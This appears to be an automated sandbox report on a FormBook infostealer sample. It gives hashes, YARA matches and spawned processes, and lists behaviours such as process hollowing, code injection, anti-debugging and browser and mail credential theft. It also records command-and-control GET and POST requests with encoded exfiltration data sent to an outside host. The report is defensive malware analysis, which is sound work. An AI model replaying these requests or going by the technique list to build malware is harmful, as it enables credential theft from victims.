# Analysis Report Dgslimt_Signed_.exe

## Overview

### General Information

- Sample Name: Dgslimt_Signed_.exe
- Analysis ID: 254519
- MD5: 738cd543912792b376d1a444c01f2a13
- SHA1: 9de5396ba7bbb9b413df229948c63dad75cbebf0
- SHA256: a678db2b0d3f84a7edaa2c100192a43397a7be3d2c482b34d7bdaf1572f00720

### Detection

- Detection: FormBook
- Score: 100 (range: 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

- Detected FormBook malware
- Malicious sample detected (through community Yara rule)
- System process connects to network (likely due to code injection or exploit)
- Yara detected FormBook
- Allocates memory in foreign processes
- Injects a PE file into a foreign process
- Machine Learning detection for sample
- Maps a DLL or memory area into another process
- Modifies the prolog of user mode functions (user mode inline hooks)
- Queues an APC in another process (thread injection)
- Sample uses process hollowing technique
- Tries to detect virtualization through RDTSC time measurements
- Tries to harvest and steal browser information (history, passwords, etc)
- Tries to steal Mail credentials (via file access)
- Uses netstat to query active network connections and open ports
- Writes to foreign memory regions
- Checks if the current process is being debugged
- Contains functionality for execution timing, often used to detect debuggers
- Contains functionality to call native functions
- Contains functionality to read the PEB
- Creates a process in suspended mode (likely to inject code)
- Detected potential crypto function
- Enables debug privileges
- Found potential string decryption / allocating functions
- HTTP GET or POST without a user agent
- May sleep (evasive loops) to hinder dynamic analysis
- PE / OLE file has an invalid certificate
- PE file contains an invalid checksum
- PE file contains strange resources
- Sample file is different than original file name gathered from version info
- Uses a known web browser user agent for HTTP communication
- Uses code obfuscation techniques (call, push, ret)
- Yara signature match

### Classification

System is w10x64

- Dgslimt_Signed_.exe (PID: 6600, cmdline: 'C:\Users\user\Desktop\Dgslimt_Signed_.exe', MD5: 738CD543912792B376D1A444C01F2A13)
- ieinstal.exe (PID: 7036, cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe, MD5: DAD17AB737E680C47C8A44CBB95EE67E)
- explorer.exe (PID: 3508, MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- NETSTAT.EXE (PID: 5568, cmdline: C:\Windows\SysWOW64\NETSTAT.EXE, MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
- ieinstal.exe (PID: 4960, cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe', MD5: DAD17AB737E680C47C8A44CBB95EE67E)
- ieinstal.exe (PID: 6672, cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe', MD5: DAD17AB737E680C47C8A44CBB95EE67E)

## Malware Configuration

No configs have been found

## Yara Overview

### Dropped Files

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dgsllll[1] | SUSP_Reversed_Base64_Encoded_EXE | Detects a base64 encoded executable with reversed characters | Florian Roth | 0x5d56f:$s4: AEAAAAIAAQpVT; 0x7ca9f:$s4: AEAAAAIAAQpVT |

### Memory Dumps

| Source | Rule | Description | Author |
| --- | --- | --- | --- |
| 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
| 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
| 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

### Unpacked PEs

| Source | Rule | Description | Author |
| --- | --- | --- | --- |
| 4.2.ieinstal.exe.10410000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
| 4.2.ieinstal.exe.10410000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 4.2.ieinstal.exe.10410000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 4.2.ieinstal.exe.10410000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
| 4.2.ieinstal.exe.10410000.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

#### Yara detected FormBook

- Source: Yara match, file source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match, file source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

#### Machine Learning detection for sample

- Source: Dgslimt_Signed_.exe, Joe Sandbox ML: detected

### Networking:

#### Uses netstat to query active network connections and open ports

- Source: unknown, process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

#### HTTP GET or POST without a user agent

- Source: global traffic, HTTP traffic detected: GET /m3px/?RL=4MyE+CpeL4Pkxg37nk0WDQpTsr14l9AWoSemyB7rAQ1tkLL6mKl4JYswWkNQaMP7Hy1d&Rf=hd8d5zxpJVY HTTP/1.1, Host: www.thedraftmedic.com, Connection: close, Data Raw: 00 00 00 00 00 00 00

#### Uses a known web browser user agent for HTTP communication
Source: global traffic, HTTP traffic detected (request with Content-Length 408):

```http
POST /m3px/ HTTP/1.1
Host: www.thedraftmedic.com
Connection: close
Content-Length: 408
Cache-Control: no-cache
Origin: http://www.thedraftmedic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.thedraftmedic.com/m3px/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

RL=wu~-gmEpW4DUx3Cm40FwDAl9tZAuy8sw0VPHrSW8OydhrYr_36Q6aItHUmRSadLVYw4NedG0FzMP4GzIW5T6(Q5Yq8Ivhx5QZlG1ogmh9R(rXl8r970DUnu7(VufUmRtyDJjt2WEO3ohdF05mvaMd4UGrufaApeAJ3yM0Dq3mP~INnhURagcmGGxom2um46hGdcEYpKQrk8f6NfXVh541Ekepy9a5ErLFtk784Vsr0P1Ztj4JrwcS1GP26Tn0WLSG1vFTGfGuRWm2SNY1xu6ipXAEibNw2oMypazfixPPtqffO0zQqHeDbcem4MGItqkweqXmxsU7B0_G3KCGqLTHLa0EzGntHbhYFv673JJ~pBQZ3IpWIpJ1dpLalZ0Nn9DCwuDmb7D6UaTja7S(w).
```

Source: global traffic, HTTP traffic detected (request with Content-Length 167132):

```http
POST /m3px/ HTTP/1.1
Host: www.thedraftmedic.com
Connection: close
Content-Length: 167132
Cache-Control: no-cache
Origin: http://www.thedraftmedic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.thedraftmedic.com/m3px/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
```

- Source: global traffic, HTTP traffic detected: GET /m3px/?RL=4MyE+CpeL4Pkxg37nk0WDQpTsr14l9AWoSemyB7rAQ1tkLL6mKl4JYswWkNQaMP7Hy1d&Rf=hd8d5zxpJVY HTTP/1.1, Host: www.thedraftmedic.com, Connection: close, Data Raw: 00 00 00 00 00 00 00
#### Found strings which match to known social media urls

- Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, string found in binary or memory: http://www.facebook.com/favicon.ico equals www.facebook.com (Facebook)
- Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, string found in binary or memory: http://www.myspace.com/favicon.ico equals www.myspace.com (Myspace)
- Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, string found in binary or memory: http://www.rambler.ru/favicon.ico equals www.rambler.ru (Rambler)
- Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, string found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
- Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, string found in binary or memory: http://www.rambler.ru/ equals www.rambler.ru (Rambler)

#### Performs DNS lookups

- Source: unknown, DNS traffic detected: queries for: cdn.discordapp.com

#### Posts data to webserver

- Source: unknown, HTTP traffic detected: POST /m3px/ HTTP/1.1, Host: www.thedraftmedic.com, Content-Length: 408, with the same headers and body as the 408-byte POST listed under "Uses a known web browser user agent for HTTP communication"

#### Uses HTTPS

- Source: unknown, network traffic detected: HTTP traffic on port 443 -> 49722
- Source: unknown, network traffic detected: HTTP traffic on port 49722 -> 443

### E-Banking Fraud:

#### Yara detected FormBook

- Source: Yara match, file source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match, file source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

### System Summary:

#### Detected FormBook malware

#### Malicious sample detected (through community Yara rule)

| Source | Type | Matched rule | Author |
| --- | --- | --- | --- |
| 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp | MEMORY | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp | MEMORY | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp | MEMORY | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp | MEMORY | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp | MEMORY | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp | MEMORY | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp | MEMORY | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp | MEMORY | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp | MEMORY | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp | MEMORY | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 4.2.ieinstal.exe.10410000.3.raw.unpack | UNPACKEDPE | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 4.2.ieinstal.exe.10410000.3.raw.unpack | UNPACKEDPE | detect Formbook in memory | JPCERT/CC Incident Response Group |
| 4.2.ieinstal.exe.10410000.3.unpack | UNPACKEDPE | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| 4.2.ieinstal.exe.10410000.3.unpack | UNPACKEDPE | detect Formbook in memory | JPCERT/CC Incident Response Group |
#### Contains functionality to call native functions

#### Detected potential crypto function
#### Found potential string decryption / allocating functions

- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe, code function: String function 0537B150 appears 45 times

#### PE / OLE file has an invalid certificate

- Source: Dgslimt_Signed_.exe, static PE information: invalid certificate

#### PE file contains strange resources

- Source: Dgslimt_Signed_.exe, static PE information: resource name RT_BITMAP, type GLS_BINARY_LSB_FIRST
- Source: Dgslimt_Signed_.exe, static PE information: resource name RT_ICON, type GLS_BINARY_LSB_FIRST

#### Sample file is different than original file name gathered from version info

- Source: Dgslimt_Signed_.exe, 00000000.00000000.241042671.00000000004B1000.00000002.00020000.sdmp, binary or memory string: OriginalFilenameProcexp.exeB vs Dgslimt_Signed_.exe
- Source: Dgslimt_Signed_.exe, binary or memory string: OriginalFilenameProcexp.exeB vs Dgslimt_Signed_.exe

#### Yara signature match

#### Classification label

- Source: classification engine, classification label: mal100.troj.spyw.evad.winEXE@8/4@6/2

#### Creates files inside the user directory

#### Parts of this application are using Borland Delphi (probably coded in Delphi)

#### Reads the hosts file

#### Spawns processes

- Source: unknown, process created: C:\Users\user\Desktop\Dgslimt_Signed_.exe 'C:\Users\user\Desktop\Dgslimt_Signed_.exe'
- Source: unknown, process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
- Source: unknown, process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
- Source: unknown, process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
- Source: unknown, process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
- Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe, process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
- Source: C:\Windows\explorer.exe, process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
- Source: C:\Windows\explorer.exe, process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'

#### Uses an in-process (OLE) Automation server
